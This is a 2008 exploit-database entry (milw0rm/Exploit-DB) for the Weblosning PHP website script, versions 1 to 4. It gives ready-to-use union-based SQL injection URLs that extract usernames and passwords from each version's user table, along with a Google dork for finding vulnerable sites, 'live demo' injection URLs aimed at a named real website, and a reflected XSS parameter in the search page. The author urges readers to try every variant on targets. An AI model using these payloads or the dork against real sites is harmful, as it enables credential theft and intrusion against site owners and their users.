webl?sninger <= 4 - xss/SQL Multiple Vulnerabilities

2008-05-21T00:00:00
ID EDB-ID:5664
Type exploitdb
Reporter Mr.SQL
Modified 2008-05-21T00:00:00

Description

Webl?sninger. CVE-2008-2505,CVE-2008-2506. Webapps exploit for php platform

                                        
                                            ################ Viva IsLaM ################
#   (sql / xss ) Multiple Vulnerabilities
#     
#   weblosning   V1, V2,V3,V4 (( index2.php id ))                              
############################################
## Script Name : Weblosning (( V1, V2,V3,V4 ))
##
## Demo :   http://www.simpelside.dk/
############################################
##
## AuTh0r: Mr.SQL
## H0ME  : WwW.PaL-HaCkEr.CoM
## Email : SQL@Hotmail.it
## 
############################################
##      (( V1 ::V2 :: V3 :: V4 ))
##
## D0rk :  allinurl: "index2.php" mainid
##
====>>>   SQL ::::::::

       V1  =====>>  http://www.target.dk/  index2.php?id=31&mainid=-1+union+select+1,2,3,concat_ws(0x3a3a,brugernavn,adgangskode),5,6+from+web1_brugere/*
         
       V2  =====>>  http://www.target.dk/  index2.php?id=31&mainid=-1+union+select+1,2,3,concat_ws(0x3a3a,brugernavn,adgangskode),5,6+from+web2_brugere/*
         
       V3 =====>>  http://www.target.dk/  index2.php?id=31&mainid=-1+union+select+1,2,3,concat_ws(0x3a3a,brugernavn,adgangskode),5,6+from+web3_brugere/*
          
       V4 =====>>  http://www.target.dk/  index2.php?id=31&mainid=-1+union+select+1,2,3,concat_ws(0x3a3a,brugernavn,adgangskode),5,6+from+web4_brugere/*


## Note ## plz use all exploits to have good results , the sites have difrrent versions , so you must test all tables name on targets the ,table name like this [  web1_brugere , web2_brugere , web3_brugere , web4_brugere ]  to know script version 
 

## Video How to use tables  :)       http://www.4shared.com/file/48485309/1fa3df0/weblosning.html


##  :: liVe DeM0 ::


version (1)  http://www.simpelside.dk/web1/index2.php?id=-4+union+select+1,2,concat_ws(0x3a3a,brugernavn,adgangskode),4,5,6+from+web1_brugere/*

version (2)   http://www.simpelside.dk/web2/index2.php?id=2&mainid=-1+union+select+1,concat_ws(0x3a3a,brugernavn,adgangskode),3+from+web2_brugere/*

version (3)    http://www.simpelside.dk/web3/index2.php?id=-3+union+select+1,concat_ws(0x3a3a,brugernavn,adgangskode),3,4,5,6+from+web3_brugere/*

version (4)  http://www.simpelside.dk/web4/index2.php?id=-1+union+select+1,concat_ws(0x3a3a,brugernavn,adgangskode),3,4,5,6+from+web4_brugere/*

#########################################################################################
      
====>> xss ::::::
                      http://www.target.dk/web1/result.php?search= (xss)
====>>
        EX ::::  http://www.simpelside.dk/web1/result.php?search= Viva%20Islam%20

 
#########################################################################################

<< Gr33Tz>>  (( HaCkEr-EGy )) :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH ::  (( MuslimS HaCkErS ))

#########################################################################################
                       -(:::: Geek Inj3cT0r ::::)-

# milw0rm.com [2008-05-21]